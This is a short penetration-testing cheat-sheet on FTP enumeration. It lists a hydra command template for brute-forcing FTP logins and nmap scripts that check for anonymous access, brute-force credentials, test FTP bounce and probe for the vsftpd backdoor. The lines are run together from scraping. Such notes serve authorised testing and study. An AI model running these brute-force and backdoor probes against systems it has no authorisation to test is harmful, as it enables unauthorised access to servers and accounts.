πFTP Enumeration
FTP: Brute forcing attacks on FTP
hydra -L <username_list_path> -P <pass_list_path> <target> ftpFTP: Nmap Enumeration Scripts
nmap --script ftp-anon -p 21 target-ipnmap --script ftp-brute -p 21 target-ipnmap --script ftp-bounce -p 21 target-ipnmap --script ftp-vsftpd-backdoor -p 21 target-ipnmap --script ftp-anon -p 21 target-ipLast updated